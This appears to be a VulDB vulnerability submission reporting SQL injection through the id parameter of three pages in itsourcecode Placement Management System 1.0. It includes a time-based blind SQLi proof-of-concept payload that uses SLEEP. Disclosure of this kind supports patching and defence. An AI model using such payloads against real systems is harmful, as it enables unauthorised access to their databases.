| Title | itsourcecode Placement Management System 1.0 SQLi |
|---|
| Description | In the view_company.php, view_drive.php, and view_student.php pages, an id parameter can be passed to query data. However, due to inadequate filtering of the id parameter on these pages, SQL injection vulnerabilities are present.
——————————POC———————————
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5490 FROM (SELECT(SLEEP(5)))qDPR) AND 'HyHB'='HyHB |
|---|
| Source | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-4.md |
|---|
| User | Dee.Mirage (UID 71702) |
|---|
| Submission | 07/31/2024 16:22 (2 years ago) |
|---|
| Moderation | 08/03/2024 08:49 (3 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 273543 [itsourcecode Placement Management System 1.0 view_company.php ID sql injection] |
|---|
| Points | 20 |
|---|